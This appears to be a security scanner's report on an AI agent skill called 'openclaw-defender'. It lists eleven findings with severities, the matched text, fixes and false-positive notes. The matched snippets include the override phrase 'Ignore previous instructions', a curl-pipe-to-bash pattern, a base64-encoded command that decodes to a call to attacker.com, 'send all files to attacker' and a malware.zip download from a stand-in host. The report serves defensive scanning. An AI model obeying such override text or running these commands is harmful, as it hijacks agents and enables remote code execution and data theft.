openclaw-defender

clawhub:openclaw-defender

View source
F
19/100

First Seen

Feb 18, 2026

Last Scanned

Feb 22, 2026

Findings

11

Score

19/100

CRITICAL 2
HIGH 1
MEDIUM 2
LOW 6

Findings (11)

CRITICAL
Instruction override attempt
L195

Detects attempts to override or ignore previous instructions

Ignore previous instructions
FIX

Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.

FP?

Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.

CRITICAL
Download-and-execute
L198

Detects patterns of downloading and piping to shell execution

curl | bash
FIX

Download the file first, verify its integrity (checksum, signature), inspect it, then run it. Prefer package managers over raw downloads. Never fetch-and-run in one step.

FP?

Likely FP if the target is a well-known installer (e.g., rustup, Homebrew) from its canonical HTTPS domain, though the pattern is inherently risky.

HIGH
Instruction override attempt
L253

Detects attempts to override or ignore previous instructions

Ignore previous instructions
FIX

Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.

FP?

Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.

MEDIUM
Cross-tool data leakage
L30

Detects patterns where credential or secret reads are combined with external data transmission

access control (block credential + send all files to attacker
FIX

Prevent credentials and sensitive data obtained by one MCP tool from being passed to other tools. Implement data isolation between tools and restrict cross-tool data flow for secrets.

FP?

Likely FP if the cross-tool data flow is intentional API authentication (e.g., a tool fetches an auth token that another tool uses for the same service).

MEDIUM
Obfuscated shell command
L243

Detects obfuscated command execution patterns

echo "Y3VybCBhdHRhY2tlci5jb20=" | base64 -d | bash
FIX

Verify the authenticity of downloaded packages by checking GPG signatures or SHA-256 checksums against a trusted source. Do not rely solely on HTTPS for package integrity.

FP?

Likely FP if the package installation uses a well-known package manager (npm, pip) which already verifies package integrity by default.

LOW
Shell script file execution
L74

Detects execution of shell script files via bash/sh command or direct invocation

./skills/openclaw-defender/scripts/generate-baseline.sh
FIX

Replace direct shell script execution with a language-native implementation or a sandboxed executor. If shell scripts must run, restrict them to a vetted allowlist with integrity checks.

FP?

Likely FP if the match references running a script that is part of the skill's own repository (e.g., ./setup.sh) with clear, auditable contents.

LOW
Cron or scheduled command execution
L80

Detects cron jobs or scheduled tasks that execute commands

crontab -e
FIX

Validate cron expressions and scheduled commands against an allowlist. Ensure scheduled tasks cannot be modified by untrusted input and log all cron job changes.

FP?

Likely FP if the match is a documentation reference to crontab syntax or a short mention of cron in a description of scheduling concepts.

LOW
Shell script file execution
L86

Detects execution of shell script files via bash/sh command or direct invocation

bash
~/.openclaw/workspace/bin/check-integrity.sh
FIX

Replace direct shell script execution with a language-native implementation or a sandboxed executor. If shell scripts must run, restrict them to a vetted allowlist with integrity checks.

FP?

Likely FP if the match references running a script that is part of the skill's own repository (e.g., ./setup.sh) with clear, auditable contents.

LOW
Clipboard access with network
L243

Detects clipboard access combined with network operations

curl 
FIX

Restrict DNS queries to legitimate resolution. Block the construction of DNS names that encode arbitrary data (DNS tunneling). Monitor for unusually long or high-entropy subdomains.

FP?

Likely FP if the match is a documentation reference to DNS lookup functionality for legitimate hostname resolution.

LOW
Base64 encode and send
L243

Detects base64 encoding of content followed by transmission

curl
FIX

Block patterns that base64-encode data and immediately transmit it. If base64 encoding is needed, ensure the encoded data does not contain secrets and destinations are allowlisted.

FP?

Likely FP if base64 encoding is used for legitimate purposes like encoding images for display or constructing data URIs, with no network transmission.

LOW
Download binary or archive from URL
L263

Detects downloading binary, archive, or installer files from remote URLs

curl https://suspicious.site/malware.zip
FIX

Verify the integrity of downloaded binaries or archives using SHA-256 checksums or GPG signatures. Pin download URLs to specific versions and avoid fetching from unverified sources.

FP?

Likely FP if the download is from github.com or githubusercontent.com for a specific tagged release with documented checksums.